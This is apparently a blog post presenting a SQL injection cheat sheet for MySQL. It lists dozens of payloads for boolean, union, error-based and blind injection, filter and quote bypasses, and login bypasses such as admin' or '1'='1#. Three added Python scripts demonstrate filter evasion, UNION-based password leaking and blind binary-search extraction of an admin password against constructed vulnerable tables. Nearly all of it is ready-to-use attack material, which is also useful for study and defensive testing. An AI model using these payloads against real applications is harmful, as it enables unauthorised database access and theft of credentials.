
2. SQL INJECTION CHEAT SHEET (SQL injection)

by H232C 2019. 10. 20.

1. ?bid=if(1=1,52,2)
 : select bid from board where bid=if(1=1,52,2);
 : if() yields 52 when the condition holds and 2 otherwise, so the page shows post 52 or post 2: a boolean oracle for whatever condition is put in place of 1=1.

 

2. ?bid=if((1)like(1),1,2)#
 : select if((1)like(1),1,2);
 : select instr(1,1);
 : like, in and instr() stand in for = when the comparison operator is filtered; parenthesising the operands also removes the need for spaces.

 

3. ?bid=52 or bid=if((select(ascii(substr((select(bid)from(board)where(bid)like(52)),1,1))))=1,52,0)
 : compares the code of the first character of a subquery result. For bid=52 that character is '5' (ascii 53), so =53 takes the true branch; the same shape reads any column one character at a time.

 

4. ?bid=52 union select (1)#
: select bid from board where bid=52 union select (1);

 

5. ?bid=52 union select (version())#
: select bid from board where bid=52 union select (version());

 

6. between (replaces =, < and > when those are filtered)
 : SELECT * FROM contacts WHERE contact_id BETWEEN 100 AND 200;
   SELECT * FROM contacts WHERE contact_id >= 100 AND contact_id <= 200;
 : x BETWEEN 100 AND 100 is an equality test, which is how the blind payloads in section 32 use it.

 

7. ?bid=52 and substr((select table_name from information_schema.tables limit 0,1),1,1)>'a'#
 : select bid from board where bid=52 and substr((select table_name from information_schema.tables limit 0,1),1,1)>'a';
 : string comparison follows the column collation, which is case-insensitive for the MySQL defaults; compare ascii() values (next item) when case matters.

 

8. ?bid=52 and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>50#
 : select bid from board where bid=52 and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>50;

 

9. ?bid=52 div 52#
 : select bid from board where bid=52 div 52;   (52 div 52 is 1, so this fetches bid=1)
 : select 52 div 1;
 : div is integer division, usable when / is filtered or to build a number without typing it.

 

11. ?bid=52 or concat('t','e','s','t')='test'#
: select concat('t','e','s','t')='test';

 

12. mid() in place of substr(): ?bid=if((mid(pw,1,3))='abc',52,0)#
 : select mid('abcde',1,3);   -> 'abc'
 : select left('abcde',3);    -> 'abc'
 : select right('abcde',3);   -> 'cde'

 

13. ?bid=(select(if((1)in(1),1,2)))
 : in as another replacement for =, fully parenthesised so the payload contains no spaces.

 

14. PHP preg_match whitespace bypass
 - tab: %09 / line feed (\n): %0a / carriage return (\r): %0d
 - comment: /**/  parentheses: ()  / plus: +
 - caveat on +: the web server decodes + to a space before $_GET is populated, so + only gets past a check on the raw query string (or a WAF matching the encoded form), not a preg_match on $_GET.

 

15. Whitespace bypass: %09, %0a, %0b, %0c, %0d, %a0, /**/

Tab: %09 -> no=1%09or%09id='admin'

Line feed (\n): %0a -> no=1%0aor%0aid='admin'

Carriage return (\r): %0d -> no=1%0dor%0did='admin'

Comment: /**/ -> no=1/**/or/**/id='admin'

Parentheses: () -> no=(1)or(id='admin')

Plus: + -> no=1+or+id='admin'

Null byte: %00
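The filter of items 14 and 15 and the bypasses, run against a vulnerable query so each payload can be checked. This is an added example, not code from the original post: the target is a constructed in-memory SQLite `member` table standing in for the MySQL table the payloads assume, and the filter is a Python `re` check mirroring a `preg_match('/ /', ...)`. SQLite treats `/**/`, tab and newline as token separators the same way MySQL does, so the bypasses behave identically; the MySQL-only `%a0` separator and `#` comment are left out.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample rows standing in for the application's member table
# (hypothetical data, added for this example).
_ROWS = [(1, "admin", "s3cret"), (2, "guest", "guest"), (3, "alice", "pw1")]


def _db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (no INTEGER, id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?, ?)", _ROWS)
    return conn


def space_filter(value: str) -> bool:
    """The check item 14 describes, as preg_match('/ /', $_GET['no']) would do it:
    only the 0x20 byte is rejected; tab, newline, comments and parentheses pass."""
    return re.search(r" ", value) is not None


def lookup(raw_query_value: str) -> list:
    """Vulnerable handler for ?no=<value>. Decodes the value the way $_GET does
    (so %09 becomes a tab and + becomes a space), applies the filter, then
    concatenates the value into the query. Returns the ids of the matching
    rows, or [] when the filter blocked the request."""
    value = urllib.parse.unquote_plus(raw_query_value)
    if space_filter(value):
        return []
    rows = _db().execute("SELECT id FROM member WHERE no=" + value).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    for payload in ("2", "2 or id='admin'", "2%09or%09id='admin'",
                    "2/**/or/**/id='admin'", "(2)or(id='admin')", "2+or+id='admin'"):
        print(f"{payload:28} -> {lookup(payload)}")
```

A legitimate `no=2` returns only `guest`; the tab, newline, comment and parenthesis variants all return `admin` as well, while the `+` variant is decoded to a space before the filter sees it and is blocked, which is the caveat from item 14.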

 

16. #, -- bypass: ;%00, /*
 : when the comment terminators are filtered, cut the statement short with ;%00 or start a /* comment; closing the quote yourself with or '1'='1 (section 32) is the other way to avoid a comment altogether.

 

17. Single-quote bypass
 - hex / binary literals: select x'61'='a' / select 0x61='a' / select b'01100001'='a' / select char(97)='a'
 - base 36: select conv(10,10,36)='A'

18. auto type cast
 - false = 0
 - true = 1
 - true+true = 2
 - floor(version()) = 5 on a 5.x server: the string '5.7.28' is cast to its leading numeric prefix when used in arithmetic

 

19. substr( -> substring(
 - select substring('test' from 1 for 1)='t'
 - the from/for form needs no commas, which helps when , is filtered.

 

20. like query (prefix enumeration)
 - select id from member where id like 'a%'
 - select id from member where id like 'b%'
 - select id from member where id like 'c%'
 - select id from member where id like 'ca%'
 - select id from member where id like 'cb%'
 - select id from member where id like 'cc%'
 - each hit extends the prefix by one character. LIKE is case-insensitive under the default collations and % and _ are wildcards, so switch to the ascii() comparison when the exact bytes matter.

 

21. filtering (taking one character when substr() is blocked)
 - select mid('asd',1,1) = 'a'
 - select lpad('asd',1,space(1)) = 'a'
 - select rpad('asd',1,space(1)) = 'a'
 - select reverse(right(reverse('asd'),1)) = 'a'
 - select insert(insert('asd',1,0,space(0)),2,222,space(0)) = 'a'
 - select right(left('asd',1),1) = 'a'
 - select right(left('asd',2),1) = 's'
 - select right(left('asd',3),1) = 'd'

22. if filtered: case when ... then ... else ... end, ifnull(), nullif()

 

23. concat: select 'a' 's' 'd' 'f'='asdf'   (adjacent string literals are concatenated)

 

24. sleep filtered -> select benchmark(1000000,MD5(CHAR(118)))   (CPU-bound, so the delay depends on the iteration count and the server's load)

 

25. Magic Quotes bypass
 - magic_quotes_gpc escapes only GET, POST and COOKIE (and was removed in PHP 5.4); an uploaded file's name reaches the query unescaped.
 - insert into uploadfile values('filename', 'path') with the file name fdsa','1'),(user(),'1234'),('asdf
 -> insert into uploadfile values('fdsa','1'),(user(),'1234'),('asdf','path')
 : the injected middle row stores the result of user() where it can be read back later.

26. Error Based SQL Injection (force a duplicate key or a malformed value so the error message carries data)
 - select sum(5),concat(version(),floor(rand(0)*2))as a from information_schema.tables group by a;
   -> Duplicate entry '<version>1' for key 'group_key'; rand(0) is deterministic, so the collision is reproducible (the source table needs at least 3 rows)
 - select * from (select name_const(version(),1),name_const(version(),1))a
   -> Duplicate column name error on old 5.0 builds; later versions reject the non-constant argument instead
 - select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))
 - select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)
   -> XPATH syntax error containing the value; the message shows at most 32 characters, so longer values are read with substr()
 - select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)

 - if + union select error
 - select * from table where 1 and if(1=2,1,(select 1 union select 2))
   -> if() evaluates only the chosen branch; the false branch raises "Subquery returns more than 1 row", so the presence of the error is the boolean oracle

27. Running queries: select * from information_schema.processlist; -> the INFO column shows the statement text, revealing the query structure (other sessions' rows need the PROCESS privilege)

 

29. lpad (to be added)

 

30. Limit bypass

- max, min, group_concat: aggregate the subquery instead of selecting one row at a time with limit

 

31. union, group by, order by (error based column count)

select * from user where num=-1 order by 2;

select * from user where num=1 order by 3;

select * from user where num=1 group by 3;

select * from user where num=-1 union select 1,2,3;

 : raise the number after order by (or group by) until "Unknown column 'n' in 'order clause'" appears; the last value that worked is the column count, and union select then needs exactly that many columns. num=-1 makes the original query match nothing, so the injected row is the one displayed.
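The probing in item 31 driven from Python, as an added example rather than code from the original post. It assumes a constructed SQLite `user` table behind a handler that concatenates `?num=` into the query; SQLite reports an out-of-range ORDER BY term and a UNION width mismatch as errors just as MySQL does (with different wording), so the column-counting logic transfers unchanged.

```python
import sqlite3

# Constructed rows standing in for the page's `user` table (hypothetical data).
_ROWS = [(1, "admin", "s3cret"), (2, "guest", "guest")]


def _db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (num INTEGER, id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", _ROWS)
    return conn


def run(num_param: str):
    """Vulnerable endpoint: ?num=<value> concatenated into the query.
    Returns (rows, None) on success or ([], error_text) when the database
    rejected the statement; that error is the oracle used below."""
    try:
        rows = _db().execute("SELECT * FROM user WHERE num=" + num_param).fetchall()
        return rows, None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


def column_count(max_cols: int = 20) -> int:
    """Raise n in 'ORDER BY n' until the database errors (SQLite: 'ORDER BY term
    out of range', MySQL: "Unknown column 'n' in 'order clause'"); the last n
    that worked is the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        _, err = run(f"1 order by {n}")
        if err is not None:
            return n - 1
    raise RuntimeError("more than max_cols columns")


def union_leak(expr: str) -> tuple:
    """Inject '-1 union select 1,2,...,<expr>' padded to the discovered width.
    num=-1 matches no real row, so the only row returned is the injected one,
    with <expr> evaluated in its last column."""
    width = column_count()
    cols = [str(i) for i in range(1, width)] + [expr]
    rows, err = run("-1 union select " + ",".join(cols))
    if err is not None:
        raise RuntimeError(err)
    return rows[0]


if __name__ == "__main__":
    print("columns:", column_count())
    print("wrong width:", run("-1 union select 1,2")[1])
    print("admin password:", union_leak("(select pw from user where id='admin')")[-1])
```

`ORDER BY 4` fails against the three-column table, so `column_count()` returns 3; a two-column UNION is rejected with the width-mismatch error, and the padded three-column UNION carries the subquery result out in the third column.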

 

32. substr bypass: mid, right(left()), substring

33. ascii bypass: ord, hex

select ord('test'); -> 116 -> 't' (ord() returns the code of the first character; hex('t') gives '74')

select ord(mid('test',2,1)); -> 101 -> 'e'

 

32. Attack Example
 - Auth Injection : ?id=admin' or '1'='1# / ?id=admin or 1=1# / ?id=admin and 1=1# / ?id=admin' or 1# / ?id=admin' or 1-- / ' or 1#
 - Union Injection : ?id=56 union select 1,1,1,version()# 
 - Blind Injection
   ?id=apple and ascii(substr(pw,1,1))='a'#
   ?id=if(1=1,1,0) / ?id=admin and length(pw)=5#
   ?id=admin' and substr(pw,1,1)='a' or id='garbage
   ?id=admin' and ascii(substr(pw,1,1))<65 / ?id=admin' and ascii(substr(pw,1,1))LIKE(65)
   ?id=admin' and ascii(substr(pw,1,1))IN(65) / ?bid=if((mid(pw,1,3))='abc',52,0)#
   ?id=guest' and 1=if(ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))=1,1,0) or '1'='0
   ?id=guest' and substr(pw,1,1)='a' or '1'='0
   ?id=guest' and length(pw)=5 or '1'='0 / ?id=guest' and if(length(pw)=5,sleep(4),0) or '1'='0
   ?id=guest' and ascii(mid(pw,1,1))=54 or '1'='1 / ?id=guest' and mid(pw,1,1)='a' or '1'='1
   ?id=1 and 1=(ascii(substr(pw,1,1)) between 100 and 100);
   ?id=1 and 1=if((ascii(substr(pw,1,1)) between 100 and 100)=1,1,0);
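The blind extraction of sections 20 and 32 carried through end to end, as an added example that is not part of the original post. It assumes a constructed SQLite `member` table behind an `?id=` lookup that concatenates the parameter between single quotes; SQLite's `unicode()` stands in for MySQL's `ascii()`, and its LIKE is ASCII-case-insensitive by default exactly as MySQL's default collations are, which is the difference between the two strategies shown.

```python
import sqlite3
import string

# Constructed rows standing in for the page's `member` table (hypothetical data;
# the admin password carries an upper-case letter on purpose).
_ROWS = [("admin", "S3cret"), ("guest", "guest")]


def _db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?)", _ROWS)
    return conn


def page_shows_row(id_param: str) -> bool:
    """Boolean oracle: the application renders a profile iff
    SELECT id FROM member WHERE id='<id_param>' returns a row."""
    sql = "SELECT id FROM member WHERE id='" + id_param + "'"
    return _db().execute(sql).fetchone() is not None


def truth(cond: str) -> bool:
    """Wrap a condition the way the section 32 payloads do:
    admin' and <cond> and '1'='1   (the trailing '1 re-closes the app's quote)."""
    return page_shows_row("admin' and " + cond + " and '1'='1")


def pw_length(max_len: int = 64) -> int:
    """?id=admin' and length(pw)=N ... with N counted up until the page answers."""
    for n in range(1, max_len + 1):
        if truth(f"length(pw)={n}"):
            return n
    raise RuntimeError("length not found")


def extract_binary_search() -> str:
    """Binary search on the code of each character, about 7 requests per
    position; SQLite's unicode() stands in for MySQL's ascii()."""
    out = []
    for pos in range(1, pw_length() + 1):
        lo, hi = 32, 126  # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if truth(f"unicode(substr(pw,{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def extract_like_walk(alphabet: str = string.ascii_lowercase + string.digits) -> str:
    """Section 20's prefix walk: pw like 'a%', 'b%', ..., then 'sa%', 'sb%', ...
    One request per alphabet symbol per position, and LIKE folds ASCII case,
    so the result comes back in the alphabet's case."""
    prefix = ""
    for _ in range(pw_length()):
        for ch in alphabet:  # alphabet must not contain the wildcards % and _
            if truth(f"pw like '{prefix}{ch}%'"):
                prefix += ch
                break
        else:
            raise RuntimeError(f"no alphabet symbol matched at position {len(prefix) + 1}")
    return prefix


if __name__ == "__main__":
    print("length:", pw_length())
    print("binary search:", extract_binary_search())
    print("like walk:    ", extract_like_walk())
```

The binary search recovers `S3cret` exactly; the LIKE walk recovers `s3cret`, because the case-insensitive match accepts `s%` for an upper-case `S`. That is the caveat from item 20: prefix enumeration is cheap to write but needs a final ascii()-style comparison (or a binary collation) wherever the exact byte matters.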

 

31. mysql information_schema
 - select(substr((select(max(table_name))from(information_schema.tables)where(TABLE_TYPE)=('BASE TABLE')),1,1));
 : max() picks one table name without limit and the where clause skips views; add and(table_schema)=database() to restrict it to the application's own database.
